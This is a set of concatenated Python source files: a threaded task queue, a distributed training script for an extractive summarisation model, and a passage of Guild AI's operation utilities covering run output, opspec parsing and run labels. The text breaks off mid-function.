logger.info('Worker %s exiting', i)
def start(self):
"""Start the background worker threads."""
if self.run_state == RunState.RUNNING:
raise ValueError('Task queue already started.')
for i in range(self.num_workers):
thread = Thread(target=self.run_worker, args=(i,))
thread.start()
self.threads.append(thread)
self.run_state = RunState.RUNNING
def stop(self, finish_ongoing_tasks: bool = True):
"""Send signals to stop all worker threads.
Args:
finish_ongoing_tasks: If true, finishes all current tasks and then stops
the worker threads, otherwise stops the threads immediately.
"""
if self.run_state == RunState.STOPPED:
raise ValueError('Task queue already stopped.')
# Gather the queue mutex to clear it and send stop signals.
if not finish_ongoing_tasks:
with self.queue.mutex:
                # PriorityQueue has no clear(); empty the underlying heap.
                self.queue.queue.clear()
for i in range(self.num_workers):
self.queue.put((float('inf'), Signal.STOP))
logger.info('Waiting for workers to stop.')
for thread in self.threads:
thread.join()
logger.info('Task queue stopped.')
self.run_state = RunState.STOPPED
def submit_task(self, task_id: str, delay: float, fn: Callable, *args,
**kwargs):
"""Add a task to run.
Args:
task_id: An id to specify the task.
delay: How much time to wait before running the task.
fn: The function to run.
args: The args to pass to fn.
kwargs: The kwargs to pass to fn.
"""
if self.run_state == RunState.STOPPED:
raise ValueError('Start the task queue before submitting tasks.')
logger.info('Received task %s %s', task_id, delay)
time_to_run = time() + delay
args = args or ()
kwargs = kwargs or {}
with self.task_locks[task_id]:
self.tasks[task_id] += 1
task_version = self.tasks[task_id]
self.queue.put((time_to_run, (task_id, task_version, fn, args, kwargs)))
logger.info('Task queue size %s', self.queue.qsize())
def cancel_task(self, task_id: str):
"""Cancel a submitted task.
Args:
task_id: The task to cancel.
"""
logger.info('Cancel task %s', task_id)
with self.task_locks[task_id]:
self.tasks[task_id] += 1
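# A minimal usage sketch (illustrative only, assuming the classes above
# behave as documented; the task id and messages are hypothetical):
if __name__ == '__main__':
    import logging
    logging.basicConfig(level=logging.INFO)
    tq = TaskQueue(num_workers=2)
    tq.start()
    # Submitting twice with the same id bumps the version, so the stale
    # submission is detected and skipped before it runs.
    tq.submit_task('demo-task', 2.0, print, 'first submission (superseded)')
    tq.submit_task('demo-task', 2.0, print, 'second submission (runs)')
    sleep(5)
    tq.stop(finish_ongoing_tasks=True)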
|
train_extractive.py
|
#!/usr/bin/env python
"""
Main training workflow
"""
from __future__ import division
import argparse
import glob
import os
import random
import signal
import time
import torch
from distributed import multi_init
from models import data_loader, model_builder
from models.data_loader import load_dataset
from models.model_builder import ExtSummarizer
from models.trainer_ext import build_trainer
from others.logging import logger, init_logger
model_flags = ['hidden_size', 'ff_size', 'heads', 'inter_layers', 'encoder', 'ff_actv', 'use_interval', 'rnn_size']
def train_multi_ext(args):
""" Spawns 1 process per GPU """
init_logger()
nb_gpu = args.world_size
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for i in range(nb_gpu):
device_id = i
procs.append(mp.Process(target=run, args=(args,
device_id, error_queue,), daemon=True))
procs[i].start()
logger.info(" Starting process pid: %d " % procs[i].pid)
error_handler.add_child(procs[i].pid)
for p in procs:
p.join()
def run(args, device_id, error_queue):
""" run process """
setattr(args, 'gpu_ranks', [int(i) for i in args.gpu_ranks])
try:
gpu_rank = multi_init(device_id, args.world_size, args.gpu_ranks)
print('gpu_rank %d' % gpu_rank)
if gpu_rank != args.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
train_single_ext(args, device_id)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((args.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def validate_ext(args, device_id):
timestep = 0
if (args.test_all):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
xent_lst = []
for i, cp in enumerate(cp_files):
step = int(cp.split('.')[-2].split('_')[-1])
xent = validate(args, device_id, cp, step)
xent_lst.append((xent, cp))
max_step = xent_lst.index(min(xent_lst))
if (i - max_step > 10):
break
xent_lst = sorted(xent_lst, key=lambda x: x[0])[:3]
logger.info('PPL %s' % str(xent_lst))
for xent, cp in xent_lst:
step = int(cp.split('.')[-2].split('_')[-1])
test_ext(args, device_id, cp, step)
else:
while (True):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
# print(cp_files)
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (not os.path.getsize(cp) > 0):
time.sleep(60)
continue
if (time_of_cp > timestep):
timestep = time_of_cp
step = int(cp.split('.')[-2].split('_')[-1])
# print('validating')
validate(args, device_id, cp, step)
test_ext(args, device_id, cp, step)
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (time_of_cp > timestep):
continue
else:
print('sleeping...')
time.sleep(300)
def validate(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = ExtSummarizer(args, device, checkpoint)
model.eval()
valid_iter = data_loader.Dataloader(args, load_dataset(args, 'valid', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=False)
trainer = build_trainer(args, device_id, model, None)
stats = trainer.validate(valid_iter, step)
return stats.xent()
def test_ext(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = ExtSummarizer(args, device, checkpoint)
model.eval()
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.test_batch_size, device,
shuffle=False, is_test=True)
trainer = build_trainer(args, device_id, model, None)
trainer.test(test_iter, step)
def train_ext(args, device_id):
if (args.world_size > 1):
train_multi_ext(args)
else:
#print('here1')
train_single_ext(args, device_id)
def train_single_ext(args, device_id):
init_logger(args.log_file)
device = "cpu" if args.visible_gpus == '-1' else "cuda"
logger.info('Device ID %d' % device_id)
logger.info('Device %s' % device)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if device_id >= 0:
torch.cuda.set_device(device_id)
torch.cuda.manual_seed(args.seed)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if args.train_from != '':
logger.info('Loading checkpoint from %s' % args.train_from)
checkpoint = torch.load(args.train_from, map_location=lambda storage, loc: storage)
if 'opt' in checkpoint:
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
else:
checkpoint = None
def train_iter_fct():
return data_loader.Dataloader(args, load_dataset(args, 'train', shuffle=True), args.batch_size, device,
shuffle=True, is_test=False)
model = ExtSummarizer(args, device, checkpoint)
optim = model_builder.build_optim(args, model, checkpoint)
logger.info(model)
trainer = build_trainer(args, device_id, model, optim)
trainer.train(train_iter_fct, args.train_steps)
|
op_util.py
|
# Copyright 2017-2020 TensorHub, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
import csv
import importlib
import io
import logging
import os
import re
import struct
import sys
import threading
import time
import six
import yaml
from guild import config
from guild import guildfile
from guild import file_util
from guild import flag_util
from guild import log as loglib
from guild import op_cmd as op_cmd_lib
from guild import op_dep
from guild import run as runlib
from guild import util
from guild import var
from guild import vcs_util
log = logging.getLogger("guild")
MAX_DEFAULT_SOURCECODE_FILE_SIZE = 1024 * 1024
MAX_DEFAULT_SOURCECODE_COUNT = 100
DEFAULT_EXEC = "${python_exe} -um guild.op_main ${main_args} -- ${flag_args}"
STEPS_EXEC = "${python_exe} -um guild.steps_main"
LABEL_TOKENS_P = re.compile(r"(\${.+?})")
LABEL_FLAG_REF_P = re.compile(r"\${(.+?)}")
RUN_OUTPUT_STREAM_BUFFER = 4096
RESTART_NEEDED_STATUS = ("pending",)
DEFAULT_PROC_POLL_INTERVAL = 5
DEFAULT_PROC_KILL_DELAY = 30
try:
bytes('')
except TypeError:
# Python 3
LF = 10
BYTES_JOIN = bytes
else:
# Python 2
LF = b"\n"
BYTES_JOIN = lambda l: b"".join(l)
###################################################################
# Error classes
###################################################################
class ArgValueError(ValueError):
def __init__(self, arg):
super(ArgValueError, self).__init__(arg)
self.arg = arg
class FlagError(Exception):
pass
class MissingRequiredFlags(FlagError):
def __init__(self, missing):
super(MissingRequiredFlags, self).__init__(missing)
self.missing = missing
class InvalidFlagChoice(FlagError):
def __init__(self, val, flag):
super(InvalidFlagChoice, self).__init__(val, flag)
self.val = val
self.flag = flag
class InvalidFlagValue(FlagError):
def __init__(self, value, flag, msg):
super(InvalidFlagValue, self).__init__(value, flag, msg)
self.value = value
self.flag = flag
self.msg = msg
class OpDefLookupError(LookupError):
pass
class InvalidOpSpec(OpDefLookupError):
def __init__(self, opspec):
super(InvalidOpSpec, self).__init__(opspec)
self.opspec = opspec
class NoSuchModel(OpDefLookupError):
def __init__(self, opspec):
super(NoSuchModel, self).__init__(opspec)
self.opspec = opspec
class NoSuchOperation(OpDefLookupError):
def __init__(self, model, op_name):
super(NoSuchOperation, self).__init__(model, op_name)
self.model = model
self.op_name = op_name
class CwdGuildfileError(OpDefLookupError):
def __init__(self, guildfile_error):
super(CwdGuildfileError, self).__init__(guildfile_error)
self.msg = guildfile_error.msg
self.path = guildfile_error.path
class MultipleMatchingModels(OpDefLookupError):
def __init__(self, model_ref, matches):
super(MultipleMatchingModels, self).__init__(model_ref, matches)
self.model_ref = model_ref
self.matches = matches
class NoMatchingModel(OpDefLookupError):
def __init__(self, model_ref):
super(NoMatchingModel, self).__init__(model_ref)
self.model_ref = model_ref
class ModelOpProxyError(Exception):
def __init__(self, opspec, msg):
super(ModelOpProxyError, self).__init__(opspec, msg)
self.opspec = opspec
self.msg = msg
class NoSuchFlagError(FlagError):
def __init__(self, flag_name):
super(NoSuchFlagError, self).__init__(flag_name)
self.flag_name = flag_name
class InvalidOpDef(ValueError):
def __init__(self, opdef, msg):
super(InvalidOpDef, self).__init__(opdef, msg)
self.opdef = opdef
self.msg = msg
def __str__(self):
return "invalid definition for %s: %s" % (self.opdef.fullname, self.msg)
class OpCmdError(Exception):
pass
class BatchFileError(Exception):
def __init__(self, path, msg):
super(BatchFileError, self).__init__(path, msg)
self.path = path
self.msg = msg
def __str__(self):
return "cannot read trials for %s: %s" % (self.path, self.msg)
class ProcessError(Exception):
pass
###################################################################
# Run output
###################################################################
class RunOutput(object):
DEFAULT_WAIT_TIMEOUT = 10
def __init__(self, run, quiet=False, output_cb=None):
"""Creates a run output object.
Run output is not automatically opened. Use `open(proc)` to
open output for a process.
"""
assert run
self._run = run
self._quiet = quiet
self._output_cb = output_cb
self._output_lock = threading.Lock()
self._open = False
self._proc = None
self._output = None
self._index = None
self._out_tee = None
self._err_tee = None
@property
def closed(self):
return not self._open
def open(self, proc):
"""Opens output.
When open, threads are started for reading from proc.stdout
and proc.stderr and writing to sys.stdout and sys.stderr
respectively.
        Generates an error if run output is already open.
"""
self._assert_closed()
if proc.stdout is None:
raise RuntimeError("proc stdout must be a PIPE")
if proc.stderr is None:
raise RuntimeError("proc stderr must be a PIPE")
self._proc = proc
self._output = self._open_output()
self._index = self._open_index()
self._out_tee = threading.Thread(target=self._out_tee_run)
self._err_tee = threading.Thread(target=self._err_tee_run)
self._out_tee.start()
self._err_tee.start()
self._open = True
def _assert_closed(self):
if self._open:
raise RuntimeError("already open")
assert self._proc is None
assert self._output is None
assert self._index is None
assert self._out_tee is None
assert self._err_tee is None
def _open_output(self):
path = self._run.guild_path("output")
return open(path, "wb")
def _open_index(self):
path = self._run.guild_path("output.index")
return open(path, "wb")
def _out_tee_run(self):
assert self._proc
self._gen_tee_run(self._proc.stdout, sys.stdout, 0)
def _err_tee_run(self):
assert self._proc
self._gen_tee_run(self._proc.stderr, sys.stderr, 1)
def _gen_tee_run(self, input_stream, output_stream, stream_type):
assert self._output
assert self._index
os_read = os.read
os_write = os.write
input_fileno = input_stream.fileno()
if not self._quiet and hasattr(output_stream, "fileno"):
try:
stream_fileno = output_stream.fileno()
except io.UnsupportedOperation:
stream_fileno = None
else:
stream_fileno = None
output_fileno = self._output.fileno()
index_fileno = self._index.fileno()
time_ = time.time
lock = self._output_lock
line = []
while True:
buf = os_read(input_fileno, RUN_OUTPUT_STREAM_BUFFER)
if not buf:
break
with lock:
if stream_fileno is not None:
os_write(stream_fileno, buf)
os_write(output_fileno, buf)
for b in buf:
if b < 9: # non-printable
continue
line.append(b)
if b == LF:
line_bytes = BYTES_JOIN(line)
del line[:]
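                        # Each index entry packs an 8-byte millisecond
                        # timestamp and a 1-byte stream id (0=stdout,
                        # 1=stderr) for the line just completed.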
entry = struct.pack("!QB", int(time_() * 1000), stream_type)
os_write(index_fileno, entry)
if self._output_cb:
try:
self._output_cb.write(line_bytes)
except Exception:
log.exception(
"error in output callback (will be " "removed)"
)
self._output_cb = None
def wait(self, timeout=DEFAULT_WAIT_TIMEOUT):
self._assert_open()
self._out_tee.join(timeout)
self._err_tee.join(timeout)
def _assert_open(self):
if not self._open:
raise RuntimeError("not open")
assert self._proc
assert self._output
assert self._index
assert self._out_tee
assert self._err_tee
def close(self):
lock = self._acquire_output_lock()
try:
self._close()
finally:
lock.release()
def _acquire_output_lock(self, timeout=60):
"""Polling verison of acquire to support timeouts on Python 2."""
timeout_at = time.time() + timeout
while time.time() < timeout_at:
if self._output_lock.acquire(False):
return self._output_lock
time.sleep(1)
raise RuntimeError("timeout")
def _close(self):
self._assert_open()
self._output.close()
self._index.close()
if self._output_cb:
try:
self._output_cb.close()
except Exception:
log.exception("closing output callback")
assert not self._out_tee.is_alive()
assert not self._err_tee.is_alive()
self._proc = None
self._output = None
self._index = None
self._out_tee = None
self._err_tee = None
self._open = False
def wait_and_close(self, timeout=DEFAULT_WAIT_TIMEOUT):
self.wait(timeout)
self.close()
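# A rough usage sketch for RunOutput (illustrative; `run` is assumed to be
# an initialized guild run, e.g. from init_run() below, with its guild
# directory already created):
#
#     proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
#     output = RunOutput(run)
#     output.open(proc)
#     exit_code = proc.wait()
#     output.wait_and_close()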
###################################################################
# OpDef for spec
###################################################################
def opdef_for_opspec(opspec):
try:
return _model_opdef(opspec)
except OpDefLookupError:
opdef = _try_model_proxy(opspec)
if not opdef:
raise
return opdef
def _model_opdef(opspec):
model, op_name = _model_op(opspec)
opdef = _opdef_for_model_op(model, op_name)
if not opdef:
raise NoSuchOperation(model, op_name)
opdef.set_modelref(model.reference)
return opdef
def _try_model_proxy(opspec):
from guild import model_proxy
if not opspec:
return None
try:
model, op_name = model_proxy.resolve_model_op(opspec)
except model_proxy.NotSupported:
return None
except model_proxy.OpSpecError as e:
raise ModelOpProxyError(opspec, str(e))
else:
opdef = model.modeldef.get_operation(op_name)
if opdef:
opdef.set_modelref(model.reference)
return opdef
def _model_op(opspec):
model_ref, op_name = _parsed_opspec(opspec)
model = _resolve_model(model_ref)
if not model:
raise NoSuchModel(opspec)
return model, op_name
def _parsed_opspec(opspec):
parsed = parse_opspec(opspec)
if parsed is None:
raise InvalidOpSpec(opspec)
return parsed
###################################################################
# Opdef for model paths
###################################################################
def opdef_model_paths(opdef):
return _opdef_paths(opdef) + _model_parent_paths(opdef.modeldef)
def _opdef_paths(opdef):
if not opdef.guildfile.dir:
return []
abs_gf_dir = os.path.abspath(opdef.guildfile.dir)
if opdef.python_path is not None:
return [os.path.join(abs_gf_dir, p) for p in opdef.python_path]
if opdef.sourcecode and opdef.sourcecode.root:
return [os.path.join(abs_gf_dir, opdef.sourcecode.root)]
return [abs_gf_dir]
def _model_parent_paths(modeldef):
return [os.path.abspath(parent.dir) for parent in modeldef.parents]
###################################################################
# Parse opspec
###################################################################
def parse_opspec(spec):
return util.find_apply(
[
_empty_spec,
_op_spec,
_model_op_spec,
_package_model_op_spec,
_package_op_spec,
],
spec,
)
def _empty_spec(spec):
if spec:
return None
return None, None
def _op_spec(spec):
if "/" in spec or ":" in spec:
return None
return None, spec
def _model_op_spec(spec):
m = re.match(r"([^/:]*):([^/:]+)$", spec)
if not m:
return None
return m.groups()
def _package_model_op_spec(spec):
m = re.match(r"([^/:]+/[^/:?]+):([^/:]+)$", spec)
if not m:
return None
return m.groups()
def _package_op_spec(spec):
m = re.match(r"([^/:]+/):?([^/:]+)$", spec)
if not m:
return None
return m.groups()
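# Illustrative results for parse_opspec (spec strings are hypothetical):
#
#     parse_opspec("train")            -> (None, "train")
#     parse_opspec("mnist:train")      -> ("mnist", "train")
#     parse_opspec("pkg/mnist:train")  -> ("pkg/mnist", "train")
#     parse_opspec("")                 -> (None, None)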
def _resolve_model(model_ref):
return util.find_apply(
[
_resolve_cwd_model,
_resolve_system_model,
],
model_ref,
)
def _resolve_cwd_model(model_ref):
from guild import model as modellib # expensive
cwd_guildfile = _cwd_guildfile()
if not cwd_guildfile:
return None
with modellib.SetPath([cwd_guildfile.dir], clear_cache=True):
return _match_one_model(model_ref, cwd_guildfile)
def _cwd_guildfile():
try:
return guildfile.for_dir(config.cwd())
except guildfile.NoModels as e:
return None
except guildfile.GuildfileError as e:
raise CwdGuildfileError(e)
def _resolve_system_model(model_ref):
return _match_one_model(model_ref)
def _match_one_model(model_ref, cwd_guildfile=None):
matches = list(_iter_matching_models(model_ref, cwd_guildfile))
if len(matches) == 1:
return matches[0]
if len(matches) > 0 and model_ref:
return _complete_match_one_model(model_ref, matches)
return None
def _iter_matching_models(model_ref, cwd_guildfile):
from guild import model as modellib # expensive
for model in modellib.iter_models():
if model_ref:
if _match_model_ref(model_ref, model):
yield model
else:
if cwd_guildfile and _is_default_cwd_model(model, cwd_guildfile):
yield model
break
if not model.name:
yield model
def _is_default_cwd_model(model, cwd_guildfile):
default_model = cwd_guildfile.default_model
return (
default_model
and default_model.guildfile.dir == model.modeldef.guildfile.dir
and default_model.name == model.name
)
def _match_model_ref(model_ref, model):
if "/" in model_ref:
return model_ref in model.fullname
else:
return model_ref in model.name
def _complete_match_one_model(model_ref, matches):
complete_match = _model_by_name(model_ref, matches)
if complete_match:
return complete_match
raise MultipleMatchingModels(model_ref, matches)
def _model_by_name(name, models):
for model in models:
if model.name == name:
return model
return None
def _maybe_no_model_error(model_ref):
if model_ref:
raise NoMatchingModel(model_ref)
return None
def _opdef_for_model_op(model, op_name):
if op_name:
return model.modeldef.get_operation(op_name)
return model.modeldef.default_operation
###################################################################
# Run support
###################################################################
def init_run(path=None):
if not path:
run_id = runlib.mkid()
path = os.path.join(var.runs_dir(), run_id)
else:
run_id = os.path.basename(path)
return runlib.Run(run_id, path)
def set_run_marker(run, marker):
open(run.guild_path(marker), "w").close()
def clear_run_marker(run, marker):
util.ensure_deleted(run.guild_path(marker))
def set_run_pending(run):
set_run_marker(run, "PENDING")
def clear_run_pending(run):
clear_run_marker(run, "PENDING")
def write_sourcecode_digest(run, sourcecode_root):
src = os.path.join(run.dir, sourcecode_root)
digest = file_util.files_digest(src)
run.write_attr("sourcecode_digest", digest)
def write_vcs_commit(opdef, run):
if not opdef.guildfile.dir:
return
try:
commit, status = vcs_util.commit_for_dir(opdef.guildfile.dir)
except vcs_util.NoCommit:
pass
except vcs_util.CommitReadError as e:
log.warning("error reading VCS commit: %s", e)
else:
run.write_attr("vcs_commit", _format_vcs_commit(commit, status))
def _format_vcs_commit(commit, status):
if status:
return commit + "*"
return commit
def set_run_started(run):
started = runlib.timestamp()
run.write_attr("started", started)
def set_run_staged(run):
set_run_marker(run, "STAGED")
clear_run_pending(run)
set_run_started(run)
###################################################################
# Run labels
###################################################################
def run_label(label_template, flag_vals):
"""Returns a run label for template and flag vals."""
default_label = _default_run_label(flag_vals)
if not label_template:
return default_label
return _render_label_template(label_template, flag_vals, default_label)
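# Illustrative behaviour (flag values are hypothetical):
#
#     run_label(None, {"lr": 0.1})                   -> "lr=0.1"
#     run_label("lr=${lr}", {"lr": 0.1})             -> "lr=0.1"
#     run_label("run-${default_label}", {"lr": 0.1}) -> "run-lr=0.1"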
def _default_run_label(flag_vals):
"""Returns a default run label for a map of flag values.
    The default label is a string of flag assignments in the form NAME=VALUE.
"""
non_null = {name: val for name, val in flag_vals.items() if val is not None}
return " ".join(
flag_util.flag_assigns(non_null, truncate_floats=True, shorten_paths=True)
)
def _render_label_template(label_template, flag_vals, default_label):
"""Returns a rendered label template.
`label_template` is a string containing flag references. Flag
    references are resolved with values defined in `flag_vals`.
`default_label` is provided as an additional supported value,
which may be referenced using the name 'default_label' in the
template.
"""
formatted_vals = _render_template_formatted_vals(flag_vals, default_label)
return _render_label_template_formatted(label_template, formatted_vals)
def _render_template_formatted_vals(flag_vals, default_label):
formatted_vals = {
"default_label": default_label,
}
formatted_vals.update(
{
name: FormattedValue(val)
for name, val in flag_vals.items()
if val is not None
}
)
return formatted_vals
class FormattedValue(object):
def __init__(self, value):
self._value = value
self._str = None
@property
def wrapped_value(self):
return self._value
@wrapped_value.setter
def wrapped_value(self, value):
self._value = value
self._str = None
def __str__(self):
if self._str is None:
self._str = flag_util.format_flag(
self._value, truncate_floats=True, shorten_paths=True
)
return self._str
def _render_label_template_formatted(label_template, formatted_vals):
"""Renders a label template with formatted values.
`formatted_vals` is a map of names to formatted values. A
formatted value is a value wrapped as a `FormattedValue` instance.
    This function supports value filters in the form
    ``${NAME|FILTER:ARG1,ARG2}``, which require values to be
wrapped with `FormattedValue`.
"""
tokens = LABEL_TOKENS_P.split(label_template)
return "".join([_rendered_str(_render_token(t, formatted_vals)) for t in tokens])
def _render_token(token, vals):
m = LABEL_FLAG_REF_P.match(token)
if not m:
return token
ref_parts = m.group(1).split("|")
name = ref_parts[0]
transforms = ref_parts[1:]
val = vals.get(name)
for t in transforms:
val = _apply_template_transform(t, val)
return val
def _apply_template_transform(t, val):
if hasattr(val, "wrapped_value"):
val = val.wrapped_value
parts = t.split(":", 1)
if len(parts) == 1:
name, arg = parts[0], None
else:
name, arg = parts
if name[:1] == "%":
return _t_python_format(val, name)
elif name == "default":
return _t_default(val, arg)
elif name == "basename":
if arg:
log.warning("ignoring argment to baseline in %r", t)
return _t_basename(val)
elif name == "unquote":
return _t_unquote(val)
else:
log.warning("unsupported template transform: %r", t)
return "#error#"
def _t_python_format(val, fmt):
try:
return fmt % val
except ValueError as e:
log.warning("error formatting %r with %r: %s", val, fmt, e)
return val
except TypeError:
# Silently ignore type errors. ValueErrors (logged above)
# indicate an invalid formatting string, which is of
# interest. Running into an unexpected value type should let
# that value pass through.
return val
def _t_default(val, arg):
if val is None:
return arg or ""
return val
def _t_basename(val):
if not val:
return ""
return os.path.basename(util.strip_trailing_sep(val))
def _t_unquote(val):
if (
isinstance(val, six.string_types)
and len(val) >= 2
and val[0] == "'"
and val[-1] == "'"
):
return val[1:-1]
return val
def _rendered_str(s):
if s is None:
return ""
return str(s)
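# Illustrative template transforms (flag values are hypothetical):
#
#     "${model|basename}"    with model="/data/models/resnet.h5" -> "resnet.h5"
#     "${lr|%.2f}"           with lr=0.1                         -> "0.10"
#     "${opt|default:adam}"  with opt undefined                  -> "adam"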
###################################################################
# Source code support
###################################################################
def sourcecode_select_for_opdef(opdef):
root = _opdef_sourcecode_root(opdef)
rules = _select_rules_for_opdef(opdef)
return file_util.FileSelect(root, rules)
def _opdef_sourcecode_root(opdef):
return opdef.sourcecode.root or opdef.modeldef.sourcecode.root
def _select_rules_for_opdef(opdef):
if _sourcecode_disabled(opdef):
return [file_util.exclude("*")]
root = _opdef_select_rules_root(opdef)
return (
_base_sourcecode_select_rules()
+ _sourcecode_config_rules(opdef.modeldef.sourcecode, root)
+ _sourcecode_config_rules(opdef.sourcecode, root)
)
def _opdef_select_rules_root(opdef):
root_base = opdef.guildfile.dir
sourcecode_root = opdef_sourcecode_root(opdef)
if not sourcecode_root:
return root_base
return os.path.join(root_base, sourcecode_root)
def _sourcecode_disabled(opdef):
op_config = opdef.sourcecode
model_config = opdef.modeldef.sourcecode
return op_config.disabled or model_config.disabled and not op_config.specs
def opdef_sourcecode_root(opdef):
return opdef.sourcecode.root or opdef.modeldef.sourcecode.root
def _base_sourcecode_select_rules():
return [
_rule_exclude_pycache_dirs(),
_rule_exclude_dot_dirs(),
_rule_exclude_nocopy_dirs(),
_rule_exclude_venv_dirs(),
_rule_exclude_build_dirs(),
_rule_exclude_egg_info_dirs(),
_rule_include_limited_text_files(),
]
def _rule_exclude_pycache_dirs():
return file_util.exclude("__pycache__", type="dir")
def _rule_exclude_dot_dirs():
return file_util.exclude(".*", type="dir")
def _rule_exclude_nocopy_dirs():
return file_util.exclude("*", type="dir", sentinel=".guild-nocopy")
def _rule_exclude_venv_dirs():
return file_util.exclude("*", type="dir", sentinel="bin/activate")
def _rule_exclude_build_dirs():
return file_util.exclude("build", type="dir")
def _rule_exclude_egg_info_dirs():
return file_util.exclude("*.egg-info", type="dir")
def _rule_include_limited_text_files():
return file_util.include(
"*",
type="text",
size_lt=MAX_DEFAULT_SOURCECODE_FILE_SIZE + 1,
max_matches=MAX_DEFAULT_SOURCECODE_COUNT,
)
def _sourcecode_config_rules(config, root):
return [_rule_for_select_spec(spec, root) for spec in config.specs]
def _rule_for_select_spec(spec, root):
if spec.type == "include":
return _file_util_rule(file_util.include, spec, root)
elif spec.type == "exclude":
return _file_util_rule(file_util.exclude, spec, root)
else:
assert False, spec.type
def _file_util_rule(rule_f, spec, root):
patterns = _spec_patterns(spec, root)
return rule_f(patterns, type=spec.patterns_type)
def _spec_patterns(spec, root):
"""Returns patterns for spec.
    If spec patterns_type is not specified, applies a glob to any
    existing patterns that reference directories relative to root. For
example, if a pattern is 'foo' and root is '/' and the directory
'/foo' exists, the pattern is returned as 'foo/*'. This is a
convenience so that un-globbed directories match all files as a
user might expect.
"""
if spec.patterns_type:
return spec.patterns
return [_apply_dir_glob(root, p) for p in spec.patterns]
def _apply_dir_glob(root, pattern):
if os.path.isdir(os.path.join(root, pattern)):
pattern = os.path.join(pattern, "*")
return pattern
def copy_sourcecode(sourcecode_src, sourcecode_select, dest_dir, handler_cls=None):
handler_cls = handler_cls or SourceCodeCopyHandler
file_util.copytree(
dest_dir, sourcecode_select, sourcecode_src, handler_cls=handler_cls
)
class SourceCodeCopyHandler(file_util.FileCopyHandler):
"""Handler to log warnings when soure code files are skipped.
Only logs warnings when the default rules are in effect.
"""
_warned_max_matches = False
_warning_help_suffix = (
" To control which files are copied, define 'sourcecode' "
"for the operation in a Guild file."
)
def ignore(self, path, rule_results):
fullpath = os.path.join(self.src_root, path)
if self._default_rules_in_effect(rule_results):
assert len(rule_results) == 1, rule_results
(_path, failed_test), _rule = rule_results[0]
if failed_test.name == "max matches":
self._warn_max_matches()
elif failed_test.name == "size":
self._warn_max_size(fullpath)
@staticmethod
def _default_rules_in_effect(results):
return (
len(results) == 1
and results[0][1].result is True
and results[0][1].size_lt == MAX_DEFAULT_SOURCECODE_FILE_SIZE + 1
and results[0][1].max_matches == MAX_DEFAULT_SOURCECODE_COUNT
)
def _warn_max_matches(self):
if self._warned_max_matches:
return
log.warning(
"Found more than %i source code files but will only "
"copy %i as a safety measure.%s",
MAX_DEFAULT_SOURCECODE_COUNT,
MAX_DEFAULT_SOURCECODE_COUNT,
self._warning_help_suffix,
)
self._warned_max_matches = True
def _warn_max_size(self, path):
log.warning(
"Skipping potential source code file %s because it's " "too big.%s",
path,
self._warning_help_suffix,
)
###################################################################
# Op command support
###################################################################
def op_cmd_for_opdef(opdef, extra_cmd_env=None):
"""Returns tuple of op cmd for opdef and associated run attrs.
Some operations require additional information from the opdef,
which is returned as the second element of the two-tuple.
"""
cmd_args, run_attrs = _op_cmd_args_and_run_attrs(opdef)
cmd_env = _op_cmd_env(opdef, extra_cmd_env or {})
cmd_flags = _op_cmd_flags(opdef)
cmd_flags_dest = opdef.flags_dest or "args"
op_cmd = op_cmd_lib.OpCmd(cmd_args, cmd_env, cmd_flags, cmd_flags_dest)
return op_cmd, run_attrs
def _op_cmd_args_and_run_attrs(opdef):
